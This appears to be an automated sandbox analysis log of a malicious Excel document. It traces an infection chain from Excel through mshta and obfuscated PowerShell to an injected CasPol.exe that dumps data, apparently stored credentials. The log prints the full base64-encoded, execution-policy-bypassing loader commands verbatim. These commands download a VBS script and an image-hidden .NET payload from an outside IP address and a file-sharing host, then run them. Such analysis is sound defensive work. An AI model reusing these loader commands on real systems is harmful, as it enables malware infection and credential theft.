                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: CasPol.exe, CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: CasPol.exe, CasPol.exe, 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: CasPol.exe, CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: CasPol.exe, CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: CasPol.exe, CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: CasPol.exe, CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: OC25-11-24.xlsReversingLabs: Detection: 15%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_31-33246
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3100.tmp" "c:\Users\user\AppData\Local\Temp\b53lag2c\CSCFF6E95784C84671B5586A4811C47.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES77DF.tmp" "c:\Users\user\AppData\Local\Temp\ovqlooon\CSCADDA0BE83C5E4E17A4EF3CEA725DA.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\celvhtcxiwczckrdjzxnvyxm"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\eyqfiluzweuemqnhakkgfkrdatg"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
